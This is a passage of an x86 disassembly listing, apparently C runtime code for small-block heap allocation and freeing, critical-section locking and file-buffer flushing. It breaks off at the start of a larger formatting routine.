mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_42D318
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_42D2EF
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_42D2E2
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_42D2E2: ; CODE XREF: sub_42D033+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_42D314
; ---------------------------------------------------------------------------
loc_42D2EF: ; CODE XREF: sub_42D033+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_42D305
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_42D305: ; CODE XREF: sub_42D033+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_42D314: ; CODE XREF: sub_42D033+2BA�j
shr edx, cl
or [eax], edx
loc_42D318: ; CODE XREF: sub_42D033+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_42D321: ; CODE XREF: sub_42D033+1A2�j
; sub_42D033:loc_42D1E1�j
push 1
pop eax
loc_42D324: ; CODE XREF: sub_42D033+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_42D033 endp
; =============== S U B R O U T I N E =======================================
sub_42D329 proc near ; CODE XREF: sub_42C785+41�p
; sub_42D621:loc_42D7F0�p
cmp dword_451140, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_42D33D
mov esi, offset off_451130
jmp short loc_42D35A
; ---------------------------------------------------------------------------
loc_42D33D: ; CODE XREF: sub_42D329+B�j
push 2020h
push 0
push dword_676FE0
call dword_43720C ; RtlAllocateHeap
mov esi, eax
test esi, esi
jz loc_42D466
loc_42D35A: ; CODE XREF: sub_42D329+12�j
mov ebp, dword_437190
push 4
push 2000h
push 400000h
push 0
call ebp ; dword_437190
mov edi, eax
test edi, edi
jz loc_42D44F
push 4
mov ebx, 10000h
push 1000h
push ebx
push edi
call ebp ; dword_437190
test eax, eax
jz loc_42D441
mov eax, offset off_451130
cmp esi, eax
jnz short loc_42D3B9
cmp off_451130, 0
jnz short loc_42D3A9
mov off_451130, eax
loc_42D3A9: ; CODE XREF: sub_42D329+79�j
cmp off_451134, 0
jnz short loc_42D3CE
mov off_451134, eax
jmp short loc_42D3CE
; ---------------------------------------------------------------------------
loc_42D3B9: ; CODE XREF: sub_42D329+70�j
mov [esi], eax
mov eax, off_451134
mov [esi+4], eax
mov off_451134, esi
mov eax, [esi+4]
mov [eax], esi
loc_42D3CE: ; CODE XREF: sub_42D329+87�j
; sub_42D329+8E�j
lea eax, [edi+400000h]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_42D3F0: ; CODE XREF: sub_42D329+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_42D3F0
push ebx
push 0
push edi
call sub_429690
add esp, 0Ch
loc_42D419: ; CODE XREF: sub_42D329+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_42D43D
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_42D419
; ---------------------------------------------------------------------------
loc_42D43D: ; CODE XREF: sub_42D329+F7�j
mov eax, esi
jmp short loc_42D468
; ---------------------------------------------------------------------------
loc_42D441: ; CODE XREF: sub_42D329+63�j
push 8000h
push 0
push edi
call dword_437194 ; VirtualFree
loc_42D44F: ; CODE XREF: sub_42D329+4B�j
cmp esi, offset off_451130
jz short loc_42D466
push esi
push 0
push dword_676FE0
call dword_437210 ; RtlFreeHeap
loc_42D466: ; CODE XREF: sub_42D329+2B�j
; sub_42D329+12C�j
xor eax, eax
loc_42D468: ; CODE XREF: sub_42D329+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_42D329 endp
; =============== S U B R O U T I N E =======================================
sub_42D46D proc near ; CODE XREF: sub_42D4C3+A5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 8000h
push 0
push dword ptr [esi+10h]
call dword_437194 ; VirtualFree
cmp off_453150, esi
jnz short loc_42D492
mov eax, [esi+4]
mov off_453150, eax
loc_42D492: ; CODE XREF: sub_42D46D+1B�j
cmp esi, offset off_451130
jz short loc_42D4BA
mov eax, [esi+4]
mov ecx, [esi]
push esi
push 0
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push dword_676FE0
call dword_437210 ; RtlFreeHeap
pop esi
retn
; ---------------------------------------------------------------------------
loc_42D4BA: ; CODE XREF: sub_42D46D+2B�j
or dword_451140, 0FFFFFFFFh
pop esi
retn
sub_42D46D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D4C3 proc near ; CODE XREF: sub_42D5DC+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, off_451134
push edi
loc_42D4D0: ; CODE XREF: sub_42D4C3+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_42D56E
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_42D4E9: ; CODE XREF: sub_42D4C3+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_42D52A
mov eax, ebx
push 4000h
add eax, [esi+10h]
push 1000h
push eax
call dword_437194 ; VirtualFree
test eax, eax
jz short loc_42D52A
or dword ptr [edi], 0FFFFFFFFh
dec dword_676918
mov eax, [esi+0Ch]
test eax, eax
jz short loc_42D51F
cmp eax, edi
jbe short loc_42D522
loc_42D51F: ; CODE XREF: sub_42D4C3+56�j
mov [esi+0Ch], edi
loc_42D522: ; CODE XREF: sub_42D4C3+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_42D537
loc_42D52A: ; CODE XREF: sub_42D4C3+2C�j
; sub_42D4C3+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_42D4E9
loc_42D537: ; CODE XREF: sub_42D4C3+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_42D56E
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_42D56E
push 1
lea eax, [ecx+20h]
pop edx
loc_42D54E: ; CODE XREF: sub_42D4C3+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_42D55F
inc edx
add eax, 8
cmp edx, 400h
jl short loc_42D54E
loc_42D55F: ; CODE XREF: sub_42D4C3+8E�j
cmp edx, 400h
jnz short loc_42D56E
push ecx
call sub_42D46D
pop ecx
loc_42D56E: ; CODE XREF: sub_42D4C3+11�j
; sub_42D4C3+7D�j ...
cmp esi, off_451134
jz short loc_42D580
cmp [ebp+arg_0], 0
jg loc_42D4D0
loc_42D580: ; CODE XREF: sub_42D4C3+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_42D4C3 endp
; =============== S U B R O U T I N E =======================================
sub_42D585 proc near ; CODE XREF: sub_429822+90�p
; sub_431BB3+1D8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, offset off_451130
push esi
mov ecx, edx
loc_42D591: ; CODE XREF: sub_42D585+1C�j
cmp eax, [ecx+10h]
jbe short loc_42D59B
cmp eax, [ecx+14h]
jb short loc_42D5A3
loc_42D59B: ; CODE XREF: sub_42D585+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_42D5D8
jmp short loc_42D591
; ---------------------------------------------------------------------------
loc_42D5A3: ; CODE XREF: sub_42D585+14�j
test al, 0Fh
jnz short loc_42D5D8
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_42D5D8
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_42D5D8: ; CODE XREF: sub_42D585+1A�j
; sub_42D585+20�j ...
xor eax, eax
pop esi
retn
sub_42D585 endp
; =============== S U B R O U T I N E =======================================
sub_42D5DC proc near ; CODE XREF: sub_429822+A6�p
; sub_431BB3+246�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_42D620
inc dword_676918
cmp dword_676918, 20h
jnz short locret_42D620
push 10h
call sub_42D4C3
pop ecx
locret_42D620: ; CODE XREF: sub_42D5DC+2B�j
; sub_42D5DC+3A�j
retn
sub_42D5DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D621 proc near ; CODE XREF: sub_429726+A7�p
; sub_42B2CA+C4�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, off_453150
push edi
loc_42D62F: ; CODE XREF: sub_42D621+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_42D6DA
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_42D694
loc_42D65A: ; CODE XREF: sub_42D621+6F�j
mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_42D67D
cmp [edi+4], ebx
jbe short loc_42D67D
push ebx
push ecx
push eax
call sub_42D829
add esp, 0Ch
test eax, eax
jnz short loc_42D6EC
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_42D67D: ; CODE XREF: sub_42D621+40�j
; sub_42D621+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_42D65A
jmp short loc_42D697
; ---------------------------------------------------------------------------
loc_42D694: ; CODE XREF: sub_42D621+37�j
mov ebx, [ebp+arg_0]
loc_42D697: ; CODE XREF: sub_42D621+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+var_8], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_42D6DD
loc_42D6AA: ; CODE XREF: sub_42D621+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_42D6C9
cmp [edi+4], ebx
jbe short loc_42D6C9
push ebx
push eax
push [ebp+var_4]
call sub_42D829
add esp, 0Ch
test eax, eax
jnz short loc_42D6EC
mov [edi+4], ebx
loc_42D6C9: ; CODE XREF: sub_42D621+8D�j
; sub_42D621+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+var_8]
jb short loc_42D6AA
jmp short loc_42D6DD
; ---------------------------------------------------------------------------
loc_42D6DA: ; CODE XREF: sub_42D621+14�j
mov ebx, [ebp+arg_0]
loc_42D6DD: ; CODE XREF: sub_42D621+87�j
; sub_42D621+B7�j
mov esi, [esi]
cmp esi, off_453150
jz short loc_42D6FC
jmp loc_42D62F
; ---------------------------------------------------------------------------
loc_42D6EC: ; CODE XREF: sub_42D621+54�j
; sub_42D621+A3�j
mov off_453150, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_42D824
; ---------------------------------------------------------------------------
loc_42D6FC: ; CODE XREF: sub_42D621+C4�j
mov eax, offset off_451130
mov edi, eax
loc_42D703: ; CODE XREF: sub_42D621+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_42D70F
cmp dword ptr [edi+0Ch], 0
jnz short loc_42D71B
loc_42D70F: ; CODE XREF: sub_42D621+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_42D7F0
jmp short loc_42D703
; ---------------------------------------------------------------------------
loc_42D71B: ; CODE XREF: sub_42D621+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_42D74A
loc_42D739: ; CODE XREF: sub_42D621+127�j
cmp [ebp+var_4], 10h
jge short loc_42D74A
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_42D739
loc_42D74A: ; CODE XREF: sub_42D621+116�j
; sub_42D621+11C�j
mov eax, [ebp+var_4]
push 4
shl eax, 0Ch
push 1000h
push eax
push esi
mov [ebp+var_8], eax
call dword_437190 ; VirtualAlloc
cmp eax, esi
jnz loc_42D822
push 0
push [ebp+var_8]
push esi
call sub_429690
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_42D7B1
lea eax, [esi+4]
mov [ebp+var_4], edx
loc_42D787: ; CODE XREF: sub_42D621+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_42D787
loc_42D7B1: ; CODE XREF: sub_42D621+15E�j
mov off_453150, edi
lea eax, [edi+2018h]
loc_42D7BD: ; CODE XREF: sub_42D621+1A8�j
cmp ecx, eax
jnb short loc_42D7CD
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_42D7CB
add ecx, 8
jmp short loc_42D7BD
; ---------------------------------------------------------------------------
loc_42D7CB: ; CODE XREF: sub_42D621+1A3�j
cmp ecx, eax
loc_42D7CD: ; CODE XREF: sub_42D621+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_42D824
; ---------------------------------------------------------------------------
loc_42D7F0: ; CODE XREF: sub_42D621+F2�j
call sub_42D329
test eax, eax
jz short loc_42D822
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov off_453150, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_42D824
; ---------------------------------------------------------------------------
loc_42D822: ; CODE XREF: sub_42D621+143�j
; sub_42D621+1D6�j
xor eax, eax
loc_42D824: ; CODE XREF: sub_42D621+D6�j
; sub_42D621+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_42D621 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D829 proc near ; CODE XREF: sub_42D621+4A�p
; sub_42D621+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_42D86E
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_42D85D
add [ecx], edx
sub [ecx+4], edx
jmp short loc_42D866
; ---------------------------------------------------------------------------
loc_42D85D: ; CODE XREF: sub_42D829+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_42D866: ; CODE XREF: sub_42D829+32�j
lea eax, [edi+8]
jmp loc_42D93C
; ---------------------------------------------------------------------------
loc_42D86E: ; CODE XREF: sub_42D829+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_42D877
mov eax, esi
loc_42D877: ; CODE XREF: sub_42D829+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_42D8C1
loc_42D87E: ; CODE XREF: sub_42D829+96�j
mov bl, [eax]
test bl, bl
jnz short loc_42D8B4
push 1
lea ebx, [eax+1]
pop esi
loc_42D88A: ; CODE XREF: sub_42D829+68�j
cmp byte ptr [ebx], 0
jnz short loc_42D893
inc ebx
inc esi
jmp short loc_42D88A
; ---------------------------------------------------------------------------
loc_42D893: ; CODE XREF: sub_42D829+64�j
cmp esi, edx
jnb short loc_42D8E5
cmp eax, [ebp+var_4]
jnz short loc_42D8A1
mov [ecx+4], esi
jmp short loc_42D8AD
; ---------------------------------------------------------------------------
loc_42D8A1: ; CODE XREF: sub_42D829+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_42D946
loc_42D8AD: ; CODE XREF: sub_42D829+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_42D8B9
; ---------------------------------------------------------------------------
loc_42D8B4: ; CODE XREF: sub_42D829+59�j
movzx esi, bl
add eax, esi
loc_42D8B9: ; CODE XREF: sub_42D829+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_42D87E
loc_42D8C1: ; CODE XREF: sub_42D829+53�j
lea esi, [ecx+8]
loc_42D8C4: ; CODE XREF: sub_42D829+EB�j
; sub_42D829+F2�j
cmp esi, edi
jnb short loc_42D946
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_42D946
mov al, [esi]
test al, al
jnz short loc_42D916
push 1
lea ebx, [esi+1]
pop eax
loc_42D8DC: ; CODE XREF: sub_42D829+BA�j
cmp byte ptr [ebx], 0
jnz short loc_42D906
inc ebx
inc eax
jmp short loc_42D8DC
; ---------------------------------------------------------------------------
loc_42D8E5: ; CODE XREF: sub_42D829+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_42D8F6
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_42D8FF
; ---------------------------------------------------------------------------
loc_42D8F6: ; CODE XREF: sub_42D829+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_42D8FF: ; CODE XREF: sub_42D829+CB�j
mov [eax], dl
add eax, 8
jmp short loc_42D93C
; ---------------------------------------------------------------------------
loc_42D906: ; CODE XREF: sub_42D829+B6�j
cmp eax, edx
jnb short loc_42D91D
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_42D946
mov esi, ebx
jmp short loc_42D8C4
; ---------------------------------------------------------------------------
loc_42D916: ; CODE XREF: sub_42D829+AB�j
movzx eax, al
add esi, eax
jmp short loc_42D8C4
; ---------------------------------------------------------------------------
loc_42D91D: ; CODE XREF: sub_42D829+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_42D92E
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_42D937
; ---------------------------------------------------------------------------
loc_42D92E: ; CODE XREF: sub_42D829+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_42D937: ; CODE XREF: sub_42D829+103�j
mov [esi], dl
lea eax, [esi+8]
loc_42D93C: ; CODE XREF: sub_42D829+40�j
; sub_42D829+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_42D948
; ---------------------------------------------------------------------------
loc_42D946: ; CODE XREF: sub_42D829+7E�j
; sub_42D829+9D�j ...
xor eax, eax
loc_42D948: ; CODE XREF: sub_42D829+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_42D829 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D94D proc near ; CODE XREF: sub_431BB3+202�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_42D987
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
mov dword ptr [edi+4], 0F1h
jmp short loc_42D9E7
; ---------------------------------------------------------------------------
loc_42D987: ; CODE XREF: sub_42D94D+26�j
jnb short loc_42D9EE
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp eax, esi
jb short loc_42D9EE
lea eax, [ecx+edx]
loc_42D99C: ; CODE XREF: sub_42D94D+59�j
cmp eax, esi
jnb short loc_42D9AA
cmp byte ptr [eax], 0
jnz short loc_42D9A8
inc eax
jmp short loc_42D99C
; ---------------------------------------------------------------------------
loc_42D9A8: ; CODE XREF: sub_42D94D+56�j
cmp eax, esi
loc_42D9AA: ; CODE XREF: sub_42D94D+51�j
jnz short loc_42D9EE
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_42D9E2
cmp esi, eax
jbe short loc_42D9E2
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_42D9D9
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_42D9D4
loc_42D9CD: ; CODE XREF: sub_42D94D+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_42D9CD
loc_42D9D4: ; CODE XREF: sub_42D94D+7E�j
mov [ebx+4], eax
jmp short loc_42D9E2
; ---------------------------------------------------------------------------
loc_42D9D9: ; CODE XREF: sub_42D94D+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_42D9E2: ; CODE XREF: sub_42D94D+68�j
; sub_42D94D+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_42D9E7: ; CODE XREF: sub_42D94D+38�j
mov [ebp+var_4], 1
loc_42D9EE: ; CODE XREF: sub_42D94D:loc_42D987�j
; sub_42D94D+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_42D94D endp
; =============== S U B R O U T I N E =======================================
sub_42D9F6 proc near ; CODE XREF: sub_42E3B7+1�p
push esi
mov esi, dword_437154
push off_45319C
call esi ; dword_437154
push off_45318C
call esi ; dword_437154
push off_45317C
call esi ; dword_437154
push off_45315C
call esi ; dword_437154
pop esi
retn
sub_42D9F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DA1F proc near ; CODE XREF: sub_429726+3E�p
; sub_429726+94�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
cmp dword_453158[eax*4], 0
lea esi, ds:453158h[eax*4]
jnz short loc_42DA75
push edi
push 18h
call sub_4296E8
mov edi, eax
pop ecx
test edi, edi
jnz short loc_42DA4E
push 11h
call sub_42C5AC
pop ecx
loc_42DA4E: ; CODE XREF: sub_42DA1F+25�j
push 11h
call sub_42DA1F
cmp dword ptr [esi], 0
pop ecx
push edi
jnz short loc_42DA66
call dword_437154 ; InitializeCriticalSection
mov [esi], edi
jmp short loc_42DA6C
; ---------------------------------------------------------------------------
loc_42DA66: ; CODE XREF: sub_42DA1F+3B�j
call sub_429822
pop ecx
loc_42DA6C: ; CODE XREF: sub_42DA1F+45�j
push 11h
call sub_42DA80
pop ecx
pop edi
loc_42DA75: ; CODE XREF: sub_42DA1F+16�j
push dword ptr [esi]
call dword_4370C8 ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_42DA1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DA80 proc near ; CODE XREF: sub_42978D+2�p
; sub_4297EC+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push dword_453158[eax*4]
call dword_437160 ; RtlLeaveCriticalSection
pop ebp
retn
sub_42DA80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DA95 proc near ; CODE XREF: sub_429A33+46�p
; sub_429AEE+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_42DBA1
test al, 40h
jnz loc_42DBA1
test al, 1
jz short loc_42DACD
and dword ptr [esi+4], 0
test al, 10h
jz loc_42DBA1
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_42DACD: ; CODE XREF: sub_42DA95+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_42DB07
cmp esi, offset dword_450EC0
jz short loc_42DAF5
cmp esi, offset dword_450EE0
jnz short loc_42DB00
loc_42DAF5: ; CODE XREF: sub_42DA95+56�j
push ebx
call sub_433167
test eax, eax
pop ecx
jnz short loc_42DB07
loc_42DB00: ; CODE XREF: sub_42DA95+5E�j
push esi
call sub_433123
pop ecx
loc_42DB07: ; CODE XREF: sub_42DA95+4E�j
; sub_42DA95+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_42DB77
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_42DB37
push edi
push eax
push ebx
call sub_4323CC
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_42DB6D
; ---------------------------------------------------------------------------
loc_42DB37: ; CODE XREF: sub_42DA95+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_42DB55
mov ecx, ebx
mov eax, ebx
sar ecx, 5
and eax, 1Fh
mov ecx, dword_676EC0[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
jmp short loc_42DB5A
; ---------------------------------------------------------------------------
loc_42DB55: ; CODE XREF: sub_42DA95+A5�j
mov eax, offset dword_4535B0
loc_42DB5A: ; CODE XREF: sub_42DA95+BE�j
test byte ptr [eax+4], 20h
jz short loc_42DB6D
push 2
push 0
push ebx
call sub_42F7E8
add esp, 0Ch
loc_42DB6D: ; CODE XREF: sub_42DA95+A0�j
; sub_42DA95+C9�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_42DB8B
; ---------------------------------------------------------------------------
loc_42DB77: ; CODE XREF: sub_42DA95+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_4323CC
add esp, 0Ch
mov [ebp+arg_4], eax
loc_42DB8B: ; CODE XREF: sub_42DA95+E0�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_42DB97
or dword ptr [esi+0Ch], 20h
jmp short loc_42DBA6
; ---------------------------------------------------------------------------
loc_42DB97: ; CODE XREF: sub_42DA95+FA�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_42DBA9
; ---------------------------------------------------------------------------
loc_42DBA1: ; CODE XREF: sub_42DA95+10�j
; sub_42DA95+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_42DBA6: ; CODE XREF: sub_42DA95+100�j
or eax, 0FFFFFFFFh
loc_42DBA9: ; CODE XREF: sub_42DA95+10A�j
pop esi
pop ebx
pop ebp
retn
sub_42DA95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DBAD proc near ; CODE XREF: sub_429A33+29�p
; sub_429AEE+28�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_42E2C6
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_42DBE1
; ---------------------------------------------------------------------------
loc_42DBD9: ; CODE XREF: sub_42DBAD+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
